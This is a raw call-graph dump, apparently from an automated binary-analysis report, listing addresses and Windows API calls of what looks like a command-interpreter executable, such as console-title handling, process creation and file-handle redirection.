18447->18451 18448 7ff7ab12d3f0 223 API calls 18448->18449 18449->18448 18465 7ff7ab13edcf 18449->18465 18539 7ff7ab149114 18449->18539 18451->18449 18452 7ff7ab1348d1 _wcsnicmp 18451->18452 18453 7ff7ab1348f2 _wcsnicmp 18452->18453 18454 7ff7ab134974 18452->18454 18456 7ff7ab13ed60 18453->18456 18463 7ff7ab134913 18453->18463 18472 7ff7ab136c00 18454->18472 18502 7ff7ab1493e8 18456->18502 18457 7ff7ab134866 18459 7ff7ab123278 166 API calls 18461 7ff7ab13ee59 18459->18461 18460 7ff7ab13492b 18464 7ff7ab134939 wcschr 18460->18464 18471 7ff7ab13ee15 18460->18471 18462 7ff7ab13ed80 wcsrchr 18462->18460 18463->18460 18463->18462 18463->18471 18466 7ff7ab134952 18464->18466 18467 7ff7ab13497f 18464->18467 18469 7ff7ab131ea0 8 API calls 18465->18469 18465->18471 18470 7ff7ab13498c 8 API calls 18466->18470 18485 7ff7ab1491b8 18467->18485 18469->18471 18470->18457 18471->18459 18473 7ff7ab13f900 18472->18473 18474 7ff7ab136c1d 18472->18474 18475 7ff7ab123278 166 API calls 18473->18475 18474->18473 18477 7ff7ab131ea0 8 API calls 18474->18477 18476 7ff7ab13f912 18475->18476 18478 7ff7ab136c2b 18477->18478 18545 7ff7ab1363c8 18478->18545 18480 7ff7ab136c8a 18481 7ff7ab136c97 18480->18481 18484 7ff7ab133448 166 API calls 18480->18484 18481->18457 18483 7ff7ab123278 166 API calls 18483->18480 18484->18473 18486 7ff7ab149215 18485->18486 18487 7ff7ab1491e6 18485->18487 18488 7ff7ab1309f4 2 API calls 18486->18488 18489 7ff7ab1491ee fprintf 18487->18489 18490 7ff7ab14921a 18488->18490 18491 7ff7ab14920b 18489->18491 18492 7ff7ab12b900 166 API calls 18490->18492 18491->18457 18493 7ff7ab149222 18492->18493 18493->18491 18494 7ff7ab14922a wcsrchr 18493->18494 18496 7ff7ab149243 18494->18496 18495 7ff7ab1492bf 18497 7ff7ab123278 166 API calls 18495->18497 18499 7ff7ab1492d6 18495->18499 18496->18495 18498 7ff7ab14927c _wcsnicmp 18496->18498 18501 7ff7ab133448 166 API calls 18496->18501 18497->18499 18498->18496 18500 7ff7ab12ff70 2 API calls 18499->18500 18500->18491 18501->18496 
18503 7ff7ab12b900 166 API calls 18502->18503 18504 7ff7ab14942d 18503->18504 18537 7ff7ab149631 18504->18537 18659 7ff7ab1333a8 18504->18659 18506 7ff7ab138f80 7 API calls 18508 7ff7ab149659 18506->18508 18508->18457 18509 7ff7ab123278 166 API calls 18509->18537 18510 7ff7ab14947a wcschr 18511 7ff7ab14949b 18510->18511 18538 7ff7ab149638 18510->18538 18513 7ff7ab1333a8 iswspace 18511->18513 18512 7ff7ab1333a8 iswspace 18514 7ff7ab14945d wcsrchr 18512->18514 18516 7ff7ab1494a8 18513->18516 18514->18510 18515 7ff7ab149476 18514->18515 18515->18510 18517 7ff7ab1494d2 18516->18517 18518 7ff7ab1333a8 iswspace 18516->18518 18519 7ff7ab1494e0 GetStdHandle GetConsoleMode 18517->18519 18517->18538 18520 7ff7ab1494b9 wcsrchr 18518->18520 18521 7ff7ab14950c SetConsoleMode 18519->18521 18522 7ff7ab149525 GetStdHandle GetConsoleMode 18519->18522 18520->18517 18521->18522 18523 7ff7ab14956a 18522->18523 18524 7ff7ab149551 SetConsoleMode 18522->18524 18525 7ff7ab123240 166 API calls 18523->18525 18524->18523 18526 7ff7ab14957c GetStdHandle 18525->18526 18527 7ff7ab148450 367 API calls 18526->18527 18528 7ff7ab1495ab 18527->18528 18529 7ff7ab1495da SetConsoleMode 18528->18529 18530 7ff7ab1495f1 18528->18530 18529->18530 18531 7ff7ab14960d 18530->18531 18532 7ff7ab1495f6 SetConsoleMode 18530->18532 18533 7ff7ab14961e 18531->18533 18534 7ff7ab149633 18531->18534 18531->18537 18532->18531 18536 7ff7ab13498c 8 API calls 18533->18536 18535 7ff7ab139158 7 API calls 18534->18535 18535->18538 18536->18537 18537->18506 18538->18509 18540 7ff7ab14912d 18539->18540 18543 7ff7ab149159 18539->18543 18541 7ff7ab149135 fprintf 18540->18541 18542 7ff7ab149152 18541->18542 18542->18449 18543->18542 18544 7ff7ab133448 166 API calls 18543->18544 18544->18543 18550 7ff7ab13684c 18545->18550 18547 7ff7ab13641f 18547->18480 18547->18483 18548 7ff7ab1363f3 18548->18547 18549 7ff7ab13684c 188 API calls 18548->18549 18549->18548 18551 7ff7ab136877 18550->18551 18553 7ff7ab136962 18551->18553 18568 
7ff7ab136a28 18551->18568 18555 7ff7ab13f83b 18553->18555 18611 7ff7ab136120 18553->18611 18557 7ff7ab1369b7 wcschr 18557->18553 18558 7ff7ab1368dc 18557->18558 18558->18553 18559 7ff7ab1368f4 18558->18559 18560 7ff7ab13684c 187 API calls 18559->18560 18561 7ff7ab136913 18560->18561 18567 7ff7ab13695a 18561->18567 18577 7ff7ab135d20 18561->18577 18567->18548 18573 7ff7ab136a57 18568->18573 18569 7ff7ab1368a3 18569->18553 18569->18557 18569->18558 18570 7ff7ab136a70 iswdigit 18570->18569 18571 7ff7ab136a87 wcschr 18570->18571 18571->18569 18572 7ff7ab136aa6 wcschr 18571->18572 18572->18569 18574 7ff7ab136ac5 18572->18574 18573->18569 18573->18570 18574->18569 18575 7ff7ab136ad9 wcschr 18574->18575 18575->18569 18576 7ff7ab136af4 wcschr 18575->18576 18576->18569 18576->18574 18578 7ff7ab12cd90 166 API calls 18577->18578 18579 7ff7ab135d4e 18578->18579 18580 7ff7ab13f4d4 18579->18580 18582 7ff7ab135d5a 18579->18582 18581 7ff7ab123278 166 API calls 18580->18581 18583 7ff7ab13f4de 18581->18583 18617 7ff7ab133a90 18582->18617 18586 7ff7ab12ff70 2 API calls 18587 7ff7ab135d7e 18586->18587 18588 7ff7ab135d9a 18587->18588 18589 7ff7ab135d83 wcstol 18587->18589 18590 7ff7ab136b68 18588->18590 18589->18588 18593 7ff7ab136b73 18590->18593 18591 7ff7ab136941 18591->18567 18594 7ff7ab136068 18591->18594 18592 7ff7ab13f899 printf 18592->18591 18593->18591 18593->18592 18595 7ff7ab12cd90 166 API calls 18594->18595 18596 7ff7ab1360a5 18595->18596 18597 7ff7ab13f5dc 18596->18597 18598 7ff7ab1360b1 18596->18598 18599 7ff7ab123278 166 API calls 18597->18599 18601 7ff7ab1333f0 _vsnwprintf 18598->18601 18600 7ff7ab13f5e8 18599->18600 18602 7ff7ab13f5ee GetLastError 18600->18602 18603 7ff7ab1360d9 18601->18603 18604 7ff7ab13498c 8 API calls 18603->18604 18605 7ff7ab1360e6 18604->18605 18605->18602 18606 7ff7ab1360ee 18605->18606 18607 7ff7ab12ff70 2 API calls 18606->18607 18608 7ff7ab1360f6 18607->18608 18609 7ff7ab138f80 7 API calls 18608->18609 18610 7ff7ab136105 18609->18610 
18610->18567 18629 7ff7ab1361c8 18611->18629 18613 7ff7ab1361c8 188 API calls 18614 7ff7ab136154 18613->18614 18614->18613 18615 7ff7ab136b68 printf 18614->18615 18616 7ff7ab136187 18614->18616 18615->18614 18616->18567 18618 7ff7ab133aa4 18617->18618 18619 7ff7ab133b73 18617->18619 18618->18619 18620 7ff7ab1309f4 2 API calls 18618->18620 18619->18586 18621 7ff7ab133ac8 18620->18621 18622 7ff7ab12b900 166 API calls 18621->18622 18623 7ff7ab133ad0 18622->18623 18624 7ff7ab133ad8 wcsrchr 18623->18624 18627 7ff7ab133af4 18623->18627 18624->18627 18625 7ff7ab133b66 18626 7ff7ab12ff70 2 API calls 18625->18626 18626->18619 18627->18625 18628 7ff7ab133b2d _wcsnicmp 18627->18628 18628->18627 18635 7ff7ab136270 18629->18635 18631 7ff7ab13622f 18631->18614 18632 7ff7ab136270 188 API calls 18633 7ff7ab1361fc 18632->18633 18633->18631 18633->18632 18634 7ff7ab136b68 printf 18633->18634 18634->18633 18641 7ff7ab136318 18635->18641 18637 7ff7ab1362d7 18637->18633 18638 7ff7ab136318 188 API calls 18639 7ff7ab1362a4 18638->18639 18639->18637 18639->18638 18640 7ff7ab136b68 printf 18639->18640 18640->18639 18647 7ff7ab136454 18641->18647 18643 7ff7ab136387 18643->18639 18644 7ff7ab136454 188 API calls 18645 7ff7ab13634c 18644->18645 18645->18643 18645->18644 18646 7ff7ab136b68 printf 18645->18646 18646->18645 18653 7ff7ab13653c 18647->18653 18649 7ff7ab1364bf 18649->18645 18650 7ff7ab13653c 188 API calls 18651 7ff7ab136488 18650->18651 18651->18649 18651->18650 18652 7ff7ab136b68 printf 18651->18652 18652->18651 18654 7ff7ab13662c 188 API calls 18653->18654 18657 7ff7ab136570 18654->18657 18655 7ff7ab1365af 18655->18651 18656 7ff7ab13662c 188 API calls 18656->18657 18657->18655 18657->18656 18658 7ff7ab136b68 printf 18657->18658 18658->18657 18660 7ff7ab1333b8 18659->18660 18661 7ff7ab1333bd iswspace 18660->18661 18662 7ff7ab1333d0 18660->18662 18661->18660 18661->18662 18662->18510 18662->18512 18662->18538 16779 7ff7ab138d80 16780 7ff7ab138da4 16779->16780 16781 7ff7ab138db6 
16780->16781 16782 7ff7ab138dbf Sleep 16780->16782 16783 7ff7ab138ddb _amsg_exit 16781->16783 16785 7ff7ab138de7 16781->16785 16782->16780 16783->16785 16784 7ff7ab138e56 _initterm 16786 7ff7ab138e73 _IsNonwritableInCurrentImage 16784->16786 16785->16784 16785->16786 16791 7ff7ab138e3c 16785->16791 16793 7ff7ab1337d8 GetCurrentThreadId OpenThread 16786->16793 16826 7ff7ab1304f4 16793->16826 16795 7ff7ab133839 HeapSetInformation RegOpenKeyExW 16796 7ff7ab13e9f8 RegQueryValueExW RegCloseKey 16795->16796 16797 7ff7ab13388d 16795->16797 16799 7ff7ab13ea41 GetThreadLocale 16796->16799 16798 7ff7ab135920 VirtualQuery VirtualQuery 16797->16798 16800 7ff7ab1338ab GetConsoleOutputCP GetCPInfo 16798->16800 16808 7ff7ab133919 16799->16808 16800->16799 16801 7ff7ab1338f1 memset 16800->16801 16801->16808 16802 7ff7ab134d5c 391 API calls 16802->16808 16803 7ff7ab123240 166 API calls 16803->16808 16804 7ff7ab13eb27 _setjmp 16804->16808 16805 7ff7ab133948 _setjmp 16805->16808 16806 7ff7ab148530 370 API calls 16806->16808 16807 7ff7ab1301b8 6 API calls 16807->16808 16808->16796 16808->16802 16808->16803 16808->16804 16808->16805 16808->16806 16808->16807 16809 7ff7ab134c1c 166 API calls 16808->16809 16810 7ff7ab12df60 481 API calls 16808->16810 16811 7ff7ab13eb71 _setmode 16808->16811 16812 7ff7ab1386f0 182 API calls 16808->16812 16813 7ff7ab130580 12 API calls 16808->16813 16815 7ff7ab1358e4 EnterCriticalSection LeaveCriticalSection 16808->16815 16817 7ff7ab12be00 647 API calls 16808->16817 16818 7ff7ab1358e4 EnterCriticalSection LeaveCriticalSection 16808->16818 16809->16808 16810->16808 16811->16808 16812->16808 16814 7ff7ab13398b GetConsoleOutputCP GetCPInfo 16813->16814 16816 7ff7ab1304f4 GetModuleHandleW GetProcAddress SetThreadLocale 16814->16816 16815->16808 16816->16808 16817->16808 16819 7ff7ab13ebbe GetConsoleOutputCP GetCPInfo 16818->16819 16820 7ff7ab1304f4 GetModuleHandleW GetProcAddress SetThreadLocale 16819->16820 16821 7ff7ab13ebe6 16820->16821 16822 7ff7ab12be00 
647 API calls 16821->16822 16823 7ff7ab130580 12 API calls 16821->16823 16822->16821 16824 7ff7ab13ebfc GetConsoleOutputCP GetCPInfo 16823->16824 16825 7ff7ab1304f4 GetModuleHandleW GetProcAddress SetThreadLocale 16824->16825 16825->16808 16827 7ff7ab130504 16826->16827 16828 7ff7ab13051e GetModuleHandleW 16827->16828 16829 7ff7ab13054d GetProcAddress 16827->16829 16830 7ff7ab13056c SetThreadLocale 16827->16830 16828->16827 16829->16827 22025 7ff7ab12b8c0 22028 7ff7ab12be00 22025->22028 22029 7ff7ab12b8d4 22028->22029 22030 7ff7ab12be1b 22028->22030 22030->22029 22031 7ff7ab12be47 memset 22030->22031 22032 7ff7ab12be67 22030->22032 22135 7ff7ab12bff0 22031->22135 22033 7ff7ab12be73 22032->22033 22036 7ff7ab12bf29 22032->22036 22037 7ff7ab12beaf 22032->22037 22035 7ff7ab12be92 22033->22035 22039 7ff7ab12bf0c 22033->22039 22045 7ff7ab12bea1 22035->22045 22062 7ff7ab12c620 GetConsoleTitleW 22035->22062 22038 7ff7ab12cd90 166 API calls 22036->22038 22037->22029 22043 7ff7ab12bff0 185 API calls 22037->22043 22041 7ff7ab12bf33 22038->22041 22173 7ff7ab12b0d8 memset 22039->22173 22041->22037 22046 7ff7ab12bf70 22041->22046 22047 7ff7ab1288a8 _wcsicmp 22041->22047 22043->22029 22045->22037 22051 7ff7ab12af98 2 API calls 22045->22051 22058 7ff7ab12bf75 22046->22058 22233 7ff7ab1271ec 22046->22233 22050 7ff7ab12bf5a 22047->22050 22048 7ff7ab12bf1e 22048->22037 22050->22046 22053 7ff7ab130a6c 273 API calls 22050->22053 22051->22037 22052 7ff7ab12bfa9 22052->22037 22054 7ff7ab12cd90 166 API calls 22052->22054 22053->22046 22055 7ff7ab12bfbb 22054->22055 22055->22037 22056 7ff7ab13081c 166 API calls 22055->22056 22056->22058 22057 7ff7ab12b0d8 194 API calls 22059 7ff7ab12bf7f 22057->22059 22058->22057 22059->22037 22106 7ff7ab135ad8 22059->22106 22064 7ff7ab12c675 22062->22064 22068 7ff7ab12ca2f 22062->22068 22063 7ff7ab13c5fc GetLastError 22063->22068 22065 7ff7ab12ca40 17 API calls 22064->22065 22074 7ff7ab12c69b 22065->22074 22066 7ff7ab123278 166 API calls 22066->22068 
22067 7ff7ab13855c ??_V@YAXPEAX 22067->22068 22068->22063 22068->22066 22068->22067 22069 7ff7ab12c9b5 22073 7ff7ab13855c ??_V@YAXPEAX 22069->22073 22070 7ff7ab1289c0 23 API calls 22098 7ff7ab12c964 22070->22098 22071 7ff7ab12c978 towupper 22071->22098 22072 7ff7ab13855c ??_V@YAXPEAX 22092 7ff7ab12c762 22072->22092 22093 7ff7ab12c855 22073->22093 22074->22068 22074->22069 22075 7ff7ab12d3f0 223 API calls 22074->22075 22074->22092 22078 7ff7ab12c741 22075->22078 22076 7ff7ab12c872 22081 7ff7ab13855c ??_V@YAXPEAX 22076->22081 22077 7ff7ab14ec14 173 API calls 22077->22092 22080 7ff7ab12c74d 22078->22080 22083 7ff7ab12c8b5 wcsncmp 22078->22083 22079 7ff7ab13c6b8 SetConsoleTitleW 22079->22076 22084 7ff7ab12bd38 207 API calls 22080->22084 22080->22092 22082 7ff7ab12c87c 22081->22082 22085 7ff7ab138f80 7 API calls 22082->22085 22083->22080 22083->22092 22084->22092 22087 7ff7ab12c88e 22085->22087 22086 7ff7ab12c83d 22239 7ff7ab12cb40 22086->22239 22087->22045 22089 7ff7ab12c78a wcschr 22089->22092 22091 7ff7ab13291c 8 API calls 22091->22092 22092->22068 22092->22072 22092->22086 22092->22089 22092->22091 22094 7ff7ab12ca25 22092->22094 22096 7ff7ab13c684 22092->22096 22092->22098 22100 7ff7ab12ca2a 22092->22100 22093->22076 22093->22079 22097 7ff7ab123278 166 API calls 22094->22097 22099 7ff7ab123278 166 API calls 22096->22099 22097->22068 22098->22063 22098->22069 22098->22070 22098->22071 22098->22077 22098->22092 22102 7ff7ab12ca16 GetLastError 22098->22102 22099->22068 22101 7ff7ab139158 7 API calls 22100->22101 22101->22068 22104 7ff7ab123278 166 API calls 22102->22104 22105 7ff7ab13c675 22104->22105 22105->22068 22107 7ff7ab12cd90 166 API calls 22106->22107 22108 7ff7ab135b12 22107->22108 22109 7ff7ab12cb40 166 API calls 22108->22109 22133 7ff7ab135b8b 22108->22133 22110 7ff7ab135b26 22109->22110 22113 7ff7ab130a6c 273 API calls 22110->22113 22110->22133 22111 7ff7ab138f80 7 API calls 22112 7ff7ab12bf99 22111->22112 22112->22045 22114 7ff7ab135b43 22113->22114 22115 
7ff7ab135bb8 22114->22115 22116 7ff7ab135b48 GetConsoleTitleW 22114->22116 22117 7ff7ab135bbd GetConsoleTitleW 22115->22117 22118 7ff7ab135bf4 22115->22118 22119 7ff7ab12cad4 172 API calls 22116->22119 22120 7ff7ab12cad4 172 API calls 22117->22120 22121 7ff7ab135bfd 22118->22121 22122 7ff7ab13f452 22118->22122 22123 7ff7ab135b66 22119->22123 22124 7ff7ab135bdb 22120->22124 22128 7ff7ab135c1b 22121->22128 22129 7ff7ab13f462 22121->22129 22121->22133 22126 7ff7ab133c24 166 API calls 22122->22126 22255 7ff7ab134224 InitializeProcThreadAttributeList 22123->22255 22315 7ff7ab1296e8 22124->22315 22126->22133 22131 7ff7ab123278 166 API calls 22128->22131 22132 7ff7ab123278 166 API calls 22129->22132 22130 7ff7ab135b7f 22134 7ff7ab135c3c SetConsoleTitleW 22130->22134 22131->22133 22132->22133 22133->22111 22134->22133 22136 7ff7ab12c0c4 22135->22136 22137 7ff7ab12c01c 22135->22137 22136->22032 22138 7ff7ab12c022 22137->22138 22139 7ff7ab12c086 22137->22139 22140 7ff7ab12c030 22138->22140 22141 7ff7ab12c113 22138->22141 22143 7ff7ab12c144 22139->22143 22154 7ff7ab12c094 22139->22154 22142 7ff7ab12c039 wcschr 22140->22142 22156 7ff7ab12c053 22140->22156 22152 7ff7ab12ff70 2 API calls 22141->22152 22141->22156 22145 7ff7ab12c301 22142->22145 22142->22156 22144 7ff7ab12c151 22143->22144 22162 7ff7ab12c1c8 22143->22162 22521 7ff7ab12c460 22144->22521 22151 7ff7ab12cd90 166 API calls 22145->22151 22146 7ff7ab12c058 22157 7ff7ab12ff70 2 API calls 22146->22157 22160 7ff7ab12c073 22146->22160 22147 7ff7ab12c0c6 22150 7ff7ab12c0cf wcschr 22147->22150 22147->22160 22149 7ff7ab12c460 183 API calls 22149->22154 22155 7ff7ab12c1be 22150->22155 22150->22160 22172 7ff7ab12c30b 22151->22172 22152->22156 22154->22136 22154->22149 22158 7ff7ab12cd90 166 API calls 22155->22158 22156->22146 22156->22147 22164 7ff7ab12c211 22156->22164 22157->22160 22158->22162 22159 7ff7ab12c460 183 API calls 22159->22136 22160->22136 22161 7ff7ab12c460 183 API calls 22160->22161 22161->22160 22162->22136 
22163 7ff7ab12c285 22162->22163 22162->22164 22169 7ff7ab12d840 178 API calls 22162->22169 22163->22164 22168 7ff7ab12b6b0 170 API calls 22163->22168 22167 7ff7ab12ff70 2 API calls 22164->22167 22165 7ff7ab12b6b0 170 API calls 22165->22156 22166 7ff7ab12d840 178 API calls 22166->22172 22167->22136 22170 7ff7ab12c2ac 22168->22170 22169->22162 22170->22160 22170->22164 22171 7ff7ab12c3d4 22171->22160 22171->22164 22171->22165 22172->22136 22172->22164 22172->22166 22172->22171 22174 7ff7ab12ca40 17 API calls 22173->22174 22190 7ff7ab12b162 22174->22190 22175 7ff7ab12b2e1 22177 7ff7ab12b2f7 ??_V@YAXPEAX 22175->22177 22178 7ff7ab12b303 22175->22178 22176 7ff7ab12b1d9 22181 7ff7ab12cd90 166 API calls 22176->22181 22198 7ff7ab12b1ed 22176->22198 22177->22178 22180 7ff7ab138f80 7 API calls 22178->22180 22179 7ff7ab131ea0 8 API calls 22179->22190 22182 7ff7ab12b315 22180->22182 22181->22198 22182->22035 22182->22048 22184 7ff7ab12b228 _get_osfhandle 22186 7ff7ab12b23f _get_osfhandle 22184->22186 22184->22198 22185 7ff7ab13bfef _get_osfhandle SetFilePointer 22187 7ff7ab13c01d 22185->22187 22185->22198 22186->22198 22189 7ff7ab1333f0 _vsnwprintf 22187->22189 22192 7ff7ab13c038 22189->22192 22190->22175 22190->22176 22190->22179 22190->22190 22191 7ff7ab1301b8 6 API calls 22191->22198 22197 7ff7ab123278 166 API calls 22192->22197 22193 7ff7ab13c1c3 22194 7ff7ab1333f0 _vsnwprintf 22193->22194 22194->22192 22195 7ff7ab12d208 _close 22195->22198 22196 7ff7ab1326e0 19 API calls 22196->22198 22200 7ff7ab13c1f9 22197->22200 22198->22175 22198->22184 22198->22185 22198->22191 22198->22193 22198->22195 22198->22196 22199 7ff7ab13c060 22198->22199 22201 7ff7ab13c246 22198->22201 22203 7ff7ab12b038 _dup2 22198->22203 22208 7ff7ab12b356 22198->22208 22232 7ff7ab13c1a5 22198->22232 22535 7ff7ab12affc _dup 22198->22535 22537 7ff7ab14f318 _get_osfhandle GetFileType 22198->22537 22199->22201 22204 7ff7ab1309f4 2 API calls 22199->22204 22202 7ff7ab12af98 2 API calls 22200->22202 22205 
7ff7ab12af98 2 API calls 22201->22205 22202->22175 22203->22198 22209 7ff7ab13c084 22204->22209 22210 7ff7ab13c24b 22205->22210 22206 7ff7ab12b038 _dup2 22207 7ff7ab13c1b7 22206->22207 22211 7ff7ab13c207 22207->22211 22212 7ff7ab13c1be 22207->22212 22215 7ff7ab12af98 2 API calls 22208->22215 22213 7ff7ab12b900 166 API calls 22209->22213 22214 7ff7ab14f1d8 166 API calls 22210->22214 22218 7ff7ab12d208 _close 22211->22218 22216 7ff7ab12d208 _close 22212->22216 22217 7ff7ab13c08c 22213->22217 22214->22175 22219 7ff7ab13c211 22215->22219 22216->22193 22220 7ff7ab13c094 wcsrchr 22217->22220 22224 7ff7ab13c0ad 22217->22224 22218->22208 22221 7ff7ab1333f0 _vsnwprintf 22219->22221 22220->22224 22222 7ff7ab13c22c 22221->22222 22223 7ff7ab123278 166 API calls 22222->22223 22223->22175 22224->22224 22226 7ff7ab13c0e0 _wcsnicmp 22224->22226 22228 7ff7ab13c106 22224->22228 22225 7ff7ab12ff70 2 API calls 22227 7ff7ab13c13b 22225->22227 22226->22224 22227->22201 22229 7ff7ab13c146 SearchPathW 22227->22229 22228->22225 22229->22201 22230 7ff7ab13c188 22229->22230 22231 7ff7ab1326e0 19 API calls 22230->22231 22231->22232 22232->22206 22234 7ff7ab127279 22233->22234 22235 7ff7ab127211 _setjmp 22233->22235 22234->22052 22235->22234 22237 7ff7ab127265 22235->22237 22538 7ff7ab1272b0 22237->22538 22240 7ff7ab12cb63 22239->22240 22241 7ff7ab12cd90 166 API calls 22240->22241 22242 7ff7ab12c848 22241->22242 22242->22093 22243 7ff7ab12cad4 22242->22243 22244 7ff7ab12cb05 22243->22244 22245 7ff7ab12cad9 22243->22245 22244->22093 22245->22244 22246 7ff7ab12cd90 166 API calls 22245->22246 22247 7ff7ab13c722 22246->22247 22247->22244 22248 7ff7ab13c72e GetConsoleTitleW 22247->22248 22248->22244 22249 7ff7ab13c74a 22248->22249 22250 7ff7ab12b6b0 170 API calls 22249->22250 22254 7ff7ab13c778 22250->22254 22251 7ff7ab13c7ec 22252 7ff7ab12ff70 2 API calls 22251->22252 22252->22244 22253 7ff7ab13c7dd SetConsoleTitleW 22253->22251 22254->22251 22254->22253 22256 7ff7ab1342ab 
UpdateProcThreadAttribute 22255->22256 22257 7ff7ab13ecd4 GetLastError 22255->22257 22259 7ff7ab1342eb memset memset GetStartupInfoW 22256->22259 22260 7ff7ab13ecf0 GetLastError 22256->22260 22258 7ff7ab13ecee 22257->22258 22262 7ff7ab133a90 170 API calls 22259->22262 22352 7ff7ab149eec 22260->22352 22264 7ff7ab1343a8 22262->22264 22265 7ff7ab12b900 166 API calls 22264->22265 22266 7ff7ab1343bb 22265->22266 22267 7ff7ab134638 _local_unwind 22266->22267 22268 7ff7ab1343cc 22266->22268 22267->22268 22269 7ff7ab1343de wcsrchr 22268->22269 22270 7ff7ab134415 22268->22270 22269->22270 22272 7ff7ab1343f7 lstrcmpW 22269->22272 22339 7ff7ab135a68 _get_osfhandle SetConsoleMode _get_osfhandle SetConsoleMode 22270->22339 22272->22270 22274 7ff7ab134668 22272->22274 22273 7ff7ab13441a 22275 7ff7ab13442a CreateProcessW 22273->22275 22278 7ff7ab134596 CreateProcessAsUserW 22273->22278 22340 7ff7ab149044 22274->22340 22277 7ff7ab13448b 22275->22277 22279 7ff7ab134672 GetLastError 22277->22279 22280 7ff7ab134495 CloseHandle 22277->22280 22278->22277 22288 7ff7ab13468d 22279->22288 22281 7ff7ab13498c 8 API calls 22280->22281 22282 7ff7ab1344c5 22281->22282 22287 7ff7ab1344cd 22282->22287 22282->22288 22283 7ff7ab1347a3 22283->22130 22284 7ff7ab1344f8 22284->22283 22286 7ff7ab134612 22284->22286 22290 7ff7ab135cb4 7 API calls 22284->22290 22285 7ff7ab12cd90 166 API calls 22289 7ff7ab134724 22285->22289 22291 7ff7ab13461c 22286->22291 22293 7ff7ab1347e1 CloseHandle 22286->22293 22287->22283 22287->22284 22303 7ff7ab14a250 33 API calls 22287->22303 22288->22285 22288->22287 22292 7ff7ab13472c _local_unwind 22289->22292 22299 7ff7ab13473d 22289->22299 22294 7ff7ab134517 22290->22294 22295 7ff7ab12ff70 GetProcessHeap RtlFreeHeap 22291->22295 22292->22299 22293->22291 22296 7ff7ab1333f0 _vsnwprintf 22294->22296 22297 7ff7ab1347fa DeleteProcThreadAttributeList 22295->22297 22298 7ff7ab134544 22296->22298 22300 7ff7ab138f80 7 API calls 22297->22300 22301 7ff7ab13498c 8 API calls 
22298->22301 22307 7ff7ab12ff70 GetProcessHeap RtlFreeHeap 22299->22307 22304 7ff7ab134820 22300->22304 22302 7ff7ab134558 22301->22302 22305 7ff7ab1347ae 22302->22305 22306 7ff7ab134564 22302->22306 22303->22284 22304->22130 22309 7ff7ab1333f0 _vsnwprintf 22305->22309 22308 7ff7ab13498c 8 API calls 22306->22308 22310 7ff7ab13475b _local_unwind 22307->22310 22311 7ff7ab134577 22308->22311 22309->22286 22310->22287 22311->22291 22312 7ff7ab13457f 22311->22312 22313 7ff7ab14a920 210 API calls 22312->22313 22314 7ff7ab134584 22313->22314 22314->22291 22319 7ff7ab129737 22315->22319 22317 7ff7ab12977d memset 22320 7ff7ab12ca40 17 API calls 22317->22320 22318 7ff7ab12cd90 166 API calls 22318->22319 22319->22317 22319->22318 22321 7ff7ab13b76e 22319->22321 22322 7ff7ab13b7b3 22319->22322 22324 7ff7ab12b364 17 API calls 22319->22324 22331 7ff7ab13b79a 22319->22331 22333 7ff7ab12986d 22319->22333 22334 7ff7ab1296b4 186 API calls 22319->22334 22354 7ff7ab131fac memset 22319->22354 22381 7ff7ab12ce10 22319->22381 22431 7ff7ab135920 22319->22431 22320->22319 22323 7ff7ab123278 166 API calls 22321->22323 22326 7ff7ab13b787 22323->22326 22324->22319 22325 7ff7ab13855c ??_V@YAXPEAX 22325->22322 22327 7ff7ab13b795 22326->22327 22329 7ff7ab14e944 393 API calls 22326->22329 22437 7ff7ab147694 22327->22437 22329->22327 22331->22325 22335 7ff7ab12988c 22333->22335 22336 7ff7ab129880 ??_V@YAXPEAX 22333->22336 22334->22319 22337 7ff7ab138f80 7 API calls 22335->22337 22336->22335 22338 7ff7ab12989d 22337->22338 22338->22130 22341 7ff7ab133a90 170 API calls 22340->22341 22342 7ff7ab149064 22341->22342 22343 7ff7ab14906e 22342->22343 22344 7ff7ab149083 22342->22344 22345 7ff7ab13498c 8 API calls 22343->22345 22347 7ff7ab12cd90 166 API calls 22344->22347 22346 7ff7ab149081 22345->22346 22346->22270 22348 7ff7ab14909b 22347->22348 22348->22346 22349 7ff7ab13498c 8 API calls 22348->22349 22350 7ff7ab1490ec 22349->22350 22351 7ff7ab12ff70 2 API calls 22350->22351 22351->22346 22353 
7ff7ab13ed0a DeleteProcThreadAttributeList 22352->22353 22353->22258 22355 7ff7ab13203b 22354->22355 22356 7ff7ab1320b0 22355->22356 22357 7ff7ab132094 22355->22357 22358 7ff7ab133060 171 API calls 22356->22358 22360 7ff7ab13211c 22356->22360 22359 7ff7ab1320a6 22357->22359 22361 7ff7ab123278 166 API calls 22357->22361 22358->22360 22362 7ff7ab138f80 7 API calls 22359->22362 22360->22359 22363 7ff7ab132e44 2 API calls 22360->22363 22361->22359 22364 7ff7ab132325 22362->22364 22365 7ff7ab132148 22363->22365 22364->22319 22365->22359 22366 7ff7ab132d70 3 API calls 22365->22366 22367 7ff7ab1321af 22366->22367 22368 7ff7ab12b900 166 API calls 22367->22368 22370 7ff7ab1321d0 22368->22370 22369 7ff7ab13e04a ??_V@YAXPEAX 22369->22359 22370->22369 22371 7ff7ab13221c wcsspn 22370->22371 22380 7ff7ab1322a4 ??_V@YAXPEAX 22370->22380 22373 7ff7ab12b900 166 API calls 22371->22373 22374 7ff7ab13223b 22373->22374 22374->22369 22377 7ff7ab132252 22374->22377 22375 7ff7ab12d3f0 223 API calls 22375->22380 22376 7ff7ab13e06d wcschr 22376->22377 22377->22376 22378 7ff7ab13e090 towupper 22377->22378 22379 7ff7ab13228f 22377->22379 22378->22377 22378->22379 22379->22375 22380->22359 22419 7ff7ab12d0f8 22381->22419 22425 7ff7ab12ce5b 22381->22425 22382 7ff7ab138f80 7 API calls 22384 7ff7ab12d10a 22382->22384 22383 7ff7ab13c860 22385 7ff7ab13c97c 22383->22385 22386 7ff7ab14ee88 390 API calls 22383->22386 22384->22319 22387 7ff7ab14e9b4 197 API calls 22385->22387 22389 7ff7ab13c879 22386->22389 22390 7ff7ab13c981 longjmp 22387->22390 22388 7ff7ab130494 182 API calls 22388->22425 22391 7ff7ab13c95c 22389->22391 22392 7ff7ab13c882 EnterCriticalSection LeaveCriticalSection 22389->22392 22393 7ff7ab13c99a 22390->22393 22391->22385 22398 7ff7ab1296b4 186 API calls 22391->22398 22397 7ff7ab12d0e3 22392->22397 22394 7ff7ab13c9b3 ??_V@YAXPEAX 22393->22394 22393->22419 22394->22419 22396 7ff7ab12ceaa _tell 22399 7ff7ab12d208 _close 22396->22399 22397->22319 22398->22391 22399->22425 22400 
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
